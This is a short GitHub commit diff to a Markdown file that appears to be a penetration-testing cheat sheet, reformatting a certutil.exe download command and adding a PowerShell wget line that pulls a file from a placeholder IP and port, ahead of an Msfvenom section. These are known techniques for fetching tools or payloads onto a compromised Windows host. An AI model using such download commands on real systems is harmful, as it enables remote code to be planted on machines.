Update Cheat Sheet.md

This commit is contained in:
AbdullahRizwan101 2020-10-26 17:42:27 -04:00 committed by GitHub
parent 41e3de257b
commit 7040385bae
No known key found for this signature in database
GPG key ID: 4AEE18F83AFDEB23

View file

@ -77,7 +77,8 @@ dir /a:h `show only hidden files`<br/>
### Downloading Files
certutil.exe -urlcache -f http://<ip>:<port>/<file> ouput.exe
`certutil.exe -urlcache -f http://<ip>:<port>/<file> ouput.exe`<br />
`powershell -c "wget http://<ip>:<port>/<file>" -outfile output.exe`
# Msfvenom
### List All Payloads